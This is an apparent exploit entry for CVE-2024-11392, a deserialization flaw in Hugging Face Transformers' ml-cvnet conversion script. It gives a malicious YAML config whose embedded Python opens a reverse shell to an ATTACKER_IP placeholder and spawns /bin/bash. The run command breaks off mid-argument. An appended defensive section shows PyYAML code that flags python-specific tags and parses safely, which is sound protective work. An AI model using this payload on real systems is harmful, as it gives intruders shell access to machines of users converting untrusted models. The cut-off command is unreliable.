# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392

# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.

# POC

# Create a malicious YAML configuration file called "transformers_exploit.yaml" as shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.

!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"

# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path

> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or

# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory, and "task" as any of the options mentioned in the script.
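
# Defensive check (added example, not code from this advisory or from the transformers project): a pre-flight audit for a third-party YAML config that walks the composed node tree with PyYAML and reports any `!!python/` tag without constructing objects, then parses only with the safe loader.
# Assumptions: the function names and both sample configs are constructed for illustration; the tagged sample references a harmless builtin.

```python
import yaml  # PyYAML

YAML_NS = "tag:yaml.org,2002:"

# Constructed sample configs (hypothetical keys); the tagged value is a harmless builtin.
CLEAN = "model:\n  name: mobilevitv2\n  layers: 2\n"
TAGGED = "model:\n  name: mobilevitv2\n  head: !!python/name:builtins.len\n"


def find_python_tags(text):
    """Return sorted [(line, tag)] for python-specific tags; nothing is constructed."""
    hits, seen = [], set()
    # compose_all() stops at the node graph: tags are resolved, objects are not built.
    stack = list(yaml.compose_all(text, Loader=yaml.SafeLoader))
    while stack:
        node = stack.pop()
        if node is None or id(node) in seen:  # aliases can point back at a parent
            continue
        seen.add(id(node))
        if node.tag.startswith(YAML_NS + "python/"):
            hits.append((node.start_mark.line + 1, node.tag[len(YAML_NS):]))
        if isinstance(node, yaml.SequenceNode):
            stack.extend(node.value)
        elif isinstance(node, yaml.MappingNode):
            for key, value in node.value:
                stack.extend((key, value))
    return sorted(hits)


def safe_loader_rejects(text):
    """True if yaml.safe_load refuses the document (it has no python/* constructors)."""
    try:
        yaml.safe_load(text)
    except yaml.YAMLError:
        return True
    return False


def load_config(text):
    """Refuse python-specific tags with a readable report, then parse safely."""
    hits = find_python_tags(text)
    if hits:
        raise ValueError(f"python-specific YAML tags in config: {hits}")
    return yaml.safe_load(text)


if __name__ == "__main__":
    print(find_python_tags(TAGGED))
    print(safe_loader_rejects(TAGGED))
    print(load_config(CLEAN))
```
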